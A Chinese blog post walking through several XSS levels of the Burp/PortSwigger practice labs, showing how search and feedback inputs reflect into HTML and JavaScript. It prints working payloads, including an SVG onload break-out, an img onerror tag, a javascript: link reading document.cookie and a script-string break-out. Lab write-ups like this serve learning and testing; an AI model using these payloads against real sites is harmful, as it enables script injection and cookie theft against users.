首先在搜索框中输入xx,f12查看元素,找到相关xx出现的地方进行分析,发现其出现在一个img标签内 第四关:
美文网首页
XSS-burp靶场

XSS-burp靶场

作者: _Irving | 来源:发表于2024-04-11 16:05 被阅读0次

第三关 "><svg onload=alert(1)>

  • 首先在搜索框中输入xx,f12查看元素,找到相关xx出现的地方进行分析,发现其出现在一个img标签内
<img src="/resources/images/tracker.gif?searchTerms=xx">
我们先进行闭合:
"><svg onload=alert(1)>

第四关:<img src=1 onerror=alert(1)>

首先也是在搜索框录入aaaa,f12查看出现位置如下:
<span id="searchMessage">aaaaaaa</span>
搜索框录入:<img src=1 onerror=alert(1)>
该src属性的值无效并引发错误。这会触发onerror事件处理程序,然后调用该alert()函数。因此,每当用户的浏览器尝试加载包含恶意帖子的页面时,就会执行有效负载。
搜索后,f12查看如下:
<span id="searchMessage"><img src="1" onerror="alert(123)"></span>

第五关:javascript:alert(document.cookie)

image.png
在提交反馈页面上,将查询参数更改returnPath为/后跟随机字母数字字符串。
右键单击并检查该元素,并观察您的随机字符串已放置在 ahref属性内。
改成returnPath:
javascript:alert(document.cookie)
按 Enter 键并单击“返回”。

<div class="is-linkback">
      <a id="backLink" href="javascript:alert(document.cookie)">Back</a>
</div>
点击页面的back触发

第七关:"onmouseover="alert(1)

第七关会对><进行html编码,我们录入aaa查看,其出现在input标签的带引号的属性值中,于是创造一个onmouseover属性,鼠标移动到其上调用属性值
前面的引号是为了闭合前面的属性值
"onmouseover="alert(1)

第九关:';alert(1);//

录入aaaa查询其出现的位置,我们看到如下的位置:
<script>
      var searchTerms = 'aaaa';
      document.write('<img src="/resources/images/tracker.gif?searchTerms='+encodeURIComponent(searchTerms)+'">');
</script>
所以我们录入';alert(1);//
查询后f12结果就变成这样:
<script>
       var searchTerms = '';
       alert(1);//';
      document.write('<img src="/resources/images/tracker.gif?searchTerms='+encodeURIComponent(searchTerms)+'">')
</script>

相关文章

  • Hackthebox - Previse 靶场实战

    Hackthebox - Previse 靶场实战 靶场信息 靶场类型 信息搜集 使用nmap进行端口扫描 咱们进...

  • SQL注入过程-以sqli-lab第一关为例

    1. 搭建靶场,进入第一关,靶场搭建可参照[sqli-labs 靶场搭建[http://testingpai.co...

  • 靶场

    马化腾说:有靶场,你一定能训练出一支很强的队伍出来。 对于个人的成长,要是有一个“靶场”,那也可以把自己训练得很强...

  • docker-靶场安装

    已准备靶场xxx.tar 加载靶场docker docker load --input xxx.tar 查看加载的...

  • 提权知识学习-LIN.SECURITY靶场

    学习Linux提权知识的靶场 靶场地址:https://www.vulnhub.com/entry/linsecu...

  • 墨者学院靶场 新手区 web phpMyAdmin后台文件包含分

    1.在墨者学院找到该靶场并点击启动靶场2.点击访问,进入靶场环境,并尝试默认口令(root,root),登陆成功3...

  • 网络安全必学渗透测试流程

    这个靶场是一个对渗透新手很友好的靶场。而且,该靶场包含了渗透测试的信息收集,漏洞利用和权限提升的全过程,对新手理解...

  • 第一次打靶

    靶场在山上,去往靶场的路很远。为了尽早赶到靶场不耽误训练,我们行军速度很快,要是再快一点儿那就是跑步了。 那时已经...

  • 关于靶场的一次评论框SQL注入Writeup

    靶场:http://security.secavenue.com/ 此题是在渗透吧新手群发出来的, 既然是靶场,那...

  • 靠谱的靶机环境

    DVWA 推荐新手首选靶场,配置简单,需下载 phpstudy 和靶场文件包,简单部署之后即可访问。 包含了常见的...

网友评论

      本文标题:XSS-burp靶场

      本文链接:https://www.haomeiwen.com/subject/fbbqxjtx.html